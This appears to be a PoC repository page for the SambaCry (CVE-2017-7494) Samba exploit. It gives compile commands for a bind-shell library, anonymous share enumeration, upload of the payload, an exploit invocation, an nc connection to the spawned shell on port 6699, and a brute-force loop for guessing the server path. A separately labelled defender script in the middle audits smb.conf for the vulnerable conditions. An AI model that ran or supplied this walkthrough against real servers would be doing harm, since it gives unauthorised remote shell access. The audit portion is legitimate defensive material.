PoC details: 9700e9600ef60f2b37742de8ae0b1bcd29bd9942

Source
Related vulnerability
Title: Samba security vulnerability (CVE-2017-7494)
Description: Samba is free software developed by the Samba team that lets UNIX-like operating systems interoperate with Microsoft Windows over the SMB/CIFS network protocol; it supports shared printers and file transfer between systems. Samba contains a remote code execution vulnerability: a remote attacker can use it to make the server load and execute an uploaded shared library. Affected versions: Samba before 4.6.4, before 4.5.10, and before 4.4.14.
Description
SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit
Introduction
# CVE-2017-7494 SambaCry Exploit

SambaCry (CVE-2017-7494) exploit for Samba (bind shell without Metasploit)

If you need to change the port, edit line 68 of *bindshell-samba.c* and recompile:
![image](https://user-images.githubusercontent.com/76706456/199360465-0ade3332-87b6-4c27-8adc-bbed6cc475d2.png)

```
gcc -c -fpic bindshell-samba.c
gcc -shared -o libbindshell-samba.so bindshell-samba.o
```

**How to exploit:**

List the shares (in this example an anonymous user is used):
```
smbclient -L //192.168.10.131/ -U "" -N
```
```
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	publico         Disk      Publico
	IPC$            IPC       IPC Service (maq131 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            CHORA
```

Open a share and check whether the user has write permission:
```
smbclient //192.168.10.131/publico -U "" -N
```

If the user has write permission, upload the file *libbindshell-samba.so*:
```
smb: \> mput libbindshell-samba.so
```
```
Put file libbindshell-samba.so? yes
putting file libbindshell-samba.so as \libbindshell-samba.so (3.5 kb/s) (average 3.5 kb/s)
smb: \> dir
  .                                   D        0  Tue Nov  1 19:44:15 2022
  ..                                  D        0  Wed Jun 14 14:16:35 2017
  libbindshell-samba.so               A     8432  Tue Nov  1 19:44:17 2022

		3997376 blocks of size 1024. 1960284 blocks available
smb: \>
```

**Then run the exploit:**

`python2 exploit.py -t target_ip -m path_absoluto_server_side`

Example:
```
python2 exploit.py -t 192.168.10.131 -m /home/publico/libbindshell-samba.so
```

Connect to port 6699/TCP:
```
nc -vn 192.168.10.131 6699
```

![image](https://user-images.githubusercontent.com/76706456/199361239-069544a7-0ef1-4868-8f58-7e6db17f5e2b.png)

**If you do not know the absolute path on the server side, guess it and wait for port 6699/TCP to open:**
```
for i in $(cat paths.txt);do python2 exploit.py -t 192.168.10.131 -m $i/publico/libbindshell-samba.so 2>/dev/null;done
```
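The procedure above depends on two server-side conditions: a share the client can write to, and a Samba build that still loads an uploaded library through its named-pipe code. The following Python script is an added defender-side check and is not part of this PoC repository. It parses an `smb.conf`, reports writable shares, checks whether the `nt pipe support = no` workaround published in the Samba advisory for CVE-2017-7494 is set in `[global]`, and compares a Samba version string against the fixed releases named above (4.6.4, 4.5.10, 4.4.14). The sample configuration is constructed to mirror the share listing shown earlier; the share names, paths and version strings in it are assumptions for illustration.

```python
"""Audit an smb.conf for the preconditions of CVE-2017-7494 (SambaCry).

Added defender-side example; not code from the PoC repository described above.
Reports writable shares, the 'nt pipe support = no' advisory workaround,
and whether a 4.x version string is below the fixed releases (4.6.4, 4.5.10, 4.4.14).
"""
import re

# Constructed sample config modelled on the share listing above (assumed values).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = maq131 server
   map to guest = Bad User

[print$]
   path = /var/lib/samba/printers
   read only = yes

[publico]
   comment = Publico
   path = /home/publico
   writable = yes
   guest ok = yes
"""

# Same config with the advisory workaround applied in [global].
HARDENED_SMB_CONF = SAMPLE_SMB_CONF.replace("[global]\n", "[global]\n   nt pipe support = no\n", 1)

# First fixed patch level per 4.x branch, taken from the advisory text above.
FIXED_PATCH_BY_BRANCH = {6: 4, 5: 10, 4: 14}

YES = ("yes", "true", "1")


def parse_smb_conf(text):
    """Return {section: {key: value}} for an smb.conf; keys are lower-cased and
    whitespace-normalised, lines starting with '#' or ';' are comments."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            current = m.group(1).strip()
            sections[current] = {}
            continue
        if current is None or "=" not in line:
            continue
        key, value = line.split("=", 1)
        sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def is_writable(share):
    """Samba semantics: shares default to read only; 'writable'/'writeable'/'write ok'
    are inverted synonyms of 'read only', and the last one written wins."""
    writable = False
    for key, value in share.items():  # insertion order == file order
        flag = value.lower() in YES
        if key in ("writable", "writeable", "write ok"):
            writable = flag
        elif key == "read only":
            writable = not flag
    return writable


def version_is_vulnerable(version):
    """True/False for 4.x branches covered by the advisory text above;
    None when the string is unparsable or outside those branches."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    if major != 4:
        return None
    if minor in FIXED_PATCH_BY_BRANCH:
        return patch < FIXED_PATCH_BY_BRANCH[minor]
    return False if minor > 6 else None  # 4.7+ shipped after the fix


def assess(conf_text, samba_version=None):
    """Summarise exposure: writable shares, workaround state, version check."""
    sections = parse_smb_conf(conf_text)
    glob = sections.get("global", {})
    workaround = glob.get("nt pipe support", "yes").lower() not in YES
    writable = [n for n, s in sections.items() if n != "global" and is_writable(s)]
    findings = [f"share [{n}] is writable (path={sections[n].get('path', '?')})" for n in writable]
    if writable and not workaround:
        findings.append("'nt pipe support = no' is not set in [global]")
    if samba_version is not None and version_is_vulnerable(samba_version):
        findings.append(f"Samba {samba_version} is below the fixed release for its branch")
    return {"writable_shares": writable, "nt_pipe_workaround": workaround, "findings": findings}


if __name__ == "__main__":
    for line in assess(SAMPLE_SMB_CONF, "4.6.3")["findings"]:
        print("FINDING:", line)
```

The workaround only removes the loading path; it also disables named-pipe services that Windows clients rely on, so upgrading to one of the fixed releases is the actual remediation, and the check treats a writable share on an unpatched server as a finding regardless of the setting.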
File snapshot

```
[4.0K] /data/pocs/9700e9600ef60f2b37742de8ae0b1bcd29bd9942
├── [1.9K] bindshell-samba.c
├── [  94] bindshell-samba.h
├── [ 688] exploit.py
├── [8.2K] libbindshell-samba.so
├── [ 106] paths.txt
└── [2.3K] README.md

0 directories, 6 files
```